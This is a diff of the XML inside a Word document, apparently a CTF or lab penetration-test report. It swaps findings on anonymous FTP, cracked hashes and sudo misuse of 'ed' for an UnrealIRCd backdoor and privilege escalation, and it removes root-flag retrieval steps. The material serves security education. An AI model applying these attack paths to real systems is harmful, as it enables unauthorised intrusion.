+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:outlineLvl w:val="0"/>
         <w:rPr>
@@ -9178,442 +8487,12 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Retrieving the Root Flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>After gaining root privileges, the root directory was accessed.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>cd /root</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>ls</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>A file named:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>flag.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>was discovered.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>cat flag.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Root flag:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>25d7ce0ee3cbf71efbac61f850c14fe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D9689B5" wp14:editId="232DBB86">
-            <wp:extent cx="4847619" cy="3400000"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1091098906" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1091098906" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4847619" cy="3400000"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Flags Captured Summary</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:w="6675" w:type="dxa"/>
+        <w:tblW w:w="0" w:type="auto"/>
         <w:tblCellSpacing w:w="15" w:type="dxa"/>
         <w:tblBorders>
           <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -9632,12 +8511,11 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1446"/>
-        <w:gridCol w:w="5229"/>
+        <w:gridCol w:w="1049"/>
+        <w:gridCol w:w="3882"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="391"/>
           <w:tblHeader/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
@@ -9708,7 +8586,6 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="374"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -9749,6 +8626,8 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -9757,18 +8636,19 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>5b5b8e9b01ef27a1cc0a2d5fa87d7190</w:t>
+              <w:t>c53c08b5bf2b0801c5d0c24149826a6e</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="391"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -9809,6 +8689,8 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -9817,11 +8699,13 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>25d7ce0ee3cbf71efbac61f850c14fe</w:t>
+              <w:t>ab28c8ca8da1b9ffc2d702ac54221105</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9895,7 +8779,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Anonymous FTP Access</w:t>
+        <w:t>IRC Backdoor Vulnerability</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9915,7 +8799,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The FTP service allowed anonymous login which exposed sensitive files.</w:t>
+        <w:t>The UnrealIRCd service was running a compromised version containing a backdoor.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9944,7 +8828,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Sensitive File Exposure</w:t>
+        <w:t>Lack of Service Hardening</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9964,7 +8848,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>A backup file containing password hashes was accessible through FTP.</w:t>
+        <w:t>Critical services were exposed without proper patching.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9993,7 +8877,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Weak Password Security</w:t>
+        <w:t>Weak Privilege Separation</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10013,84 +8897,31 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>One of the hashes was cracked easily using a dictionary attack.</w:t>
+        <w:t>User was able to escalate privileges easily to root.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
+        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Sudo Misconfiguration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The user had permission to execute the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ed</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> binary with root privileges, allowing privilege escalation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -10124,6 +8955,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Impact</w:t>
       </w:r>
     </w:p>
@@ -10164,7 +8996,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>• Access sensitive files via FTP</w:t>
+        <w:t>• Exploit a backdoored service</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10174,17 +9006,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Crack system credentials</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Gain SSH access to the machine</w:t>
+        <w:t>• Gain remote shell access</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10234,11 +9056,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -10250,8 +9068,93 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:t>Mitigation Recommendations</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
